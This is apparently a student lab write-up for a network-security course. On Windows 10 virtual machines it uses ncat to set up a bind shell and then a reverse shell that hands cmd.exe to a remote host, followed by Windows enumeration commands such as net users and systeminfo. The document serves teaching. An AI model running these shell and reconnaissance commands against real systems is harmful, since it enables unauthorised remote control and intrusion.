Summary: Disabled Windows 10 firewall, used ncat cmd.exe and made a listener on a PC so anyone who connects to it gets access to cmd. Next, (with victim's firewall on) opened a file that allowed someone else to connect to the PC.

Part 1:

Preparation:

Two people: 1 & 2

Each person must change the Network Adapter on their Windows 10 Virtual Machine to “NETSEC-WAN”

You may have to run: ipconfig /release ; ipconfig/renew

You should have an IP address in the 10.0.16.XXX range

Download nmap on your Windows 10 Virtual Machine: https://nmap.org/dist/nmap-7.93-setup.exe

Steps:

Person 1: ncat -l 8001 -e cmd.exe -v

"using ncat to listen on port 8001 and executes cmd.exe, -v means verbose and will show more information than it normally would"

Person 2: ncat X.X.X.X 8001

"initiating a connection to the ip of the computer the listener was setup on, and is initiating this on port 8001"

Part 2:

Preparation:

Person 1, change your Windows 10 Network Adapater and set it back to your LAN segment.

Person 1 enable your Windows 10 firewall.

Person 2, keep your Windows 10 Network Adapater on the NETSEC-WAN segment.

Steps:

Person 2: ncat -l 8080 -vv

Person 1: ncat -vv X.X.X.X 8080 -e cmd.exe

Person 2 should have control over Person 1's computer.

Now we can run other commands to enumerate a remote computer.

net users - get the list of local users

net view - enumerate other hosts

net users /domain - enumerate other users on the domain

tasklist - list of running processes

tasklist /svc - list of services

wmic os - OS details

wmic useraccount - user account details

systeminfo - detailed host information